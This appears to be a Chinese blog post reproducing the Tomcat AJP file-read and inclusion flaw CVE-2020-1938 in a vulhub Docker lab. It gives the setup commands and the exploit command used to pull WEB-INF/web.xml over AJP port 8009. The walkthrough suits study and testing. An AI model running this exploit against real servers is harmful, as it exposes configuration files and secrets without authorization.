-
Tomcat9 AJP 任意文件读取和文件包含漏洞(CVE-2020-1938)
Tomcat9 AJP 任意文件读取和文件包含漏洞(CVE-2020-1938)
1 在线漏洞解读:
https://vulhub.org/#/environments/tomcat/CVE-2020-1938/- 1
2 环境搭建
cd /home/kali/vulhub/tomcat/CVE-2020-1938- 1
2.1 修改端口8089
2.2 环境启动:
sudo docker-compose up -d sudo docker ps -a- 1
- 2
- 3
已启动:访问端口8089
3 漏洞复现
访问
http://192.168.225.166:8089/看到Tomcat示例页面,其中还有一个AJP端口8009正在监听
需要使用到工具访问AJP协议
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi- 1
┌──(kali💋kali)-[~/tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi] └─$ python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.225.166 -p 8009 -f WEB-INF/web.xml- 1
- 2
成功查看到文件
此漏洞有局限性只能读取tomcat/webapps/ROOT/目录下的文件,不存在目录穿越问题…/…/…/…/…/etc/passwd
-
相关阅读:
排序(3)【归并排序】【计数排序】【排序算法度及其稳定性分析】
SOLIDWORKS 2023新功能揭秘!升级版轻松找到材料明细表修改
Go--运算符
中秋分享几个有点意思的 GitHub 项目
干货 | BitSail Connector 开发详解系列一:Source
【解决obsidian无法跳转到zotero的问题】
PHP安全特性
Qt::绘制框架-选择模式-selectedMode
智慧公厕:提升城市形象,为市民带来极致体验
/etc/profile与~/.bash_profile的区别
- 原文地址:https://blog.csdn.net/weixin_42786460/article/details/133269653